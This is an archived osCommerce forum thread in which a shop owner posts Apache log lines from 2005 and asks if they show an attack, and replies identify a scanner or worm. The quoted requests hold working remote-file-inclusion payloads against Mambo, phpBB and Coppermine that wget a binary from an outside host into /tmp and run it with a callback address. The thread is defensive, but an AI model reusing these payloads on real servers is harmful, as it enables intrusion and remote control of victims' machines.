Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

is this a hackers attempt on my catalog ?


lerningkurv

Recommended Posts

this turned up in last nites logs

its got me a little worried wondering what apache returned in the two underlined entries !!!

 

213.133.109.66 - - [11/Dec/2005:19:58:52 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:54 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 200 13076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:55 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:56 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:57 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 200 13076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:58 -0500] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:59 -0500] "GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:00 -0500] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:02 -0500] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:03 -0500] "GET /Forums/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:04 -0500] "GET /forum/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:05 -0500] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Link to comment
Share on other sites

looks like a scanner

i get those all the time. people looking for security holes and unpatched software

 

to be safe you should ban the ip via htaccess

if the ip is from a country you do not service, ban the entire ip block

Link to comment
Share on other sites

It is an active exploit, some sort of worm maybe - it is downloading a file called 'cb' which is a unix executable which then connects to another server (possibly DOS). Anyway, check /tmp for a file called cb (or asking your hosting provider to do it if you can't)

.shin

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...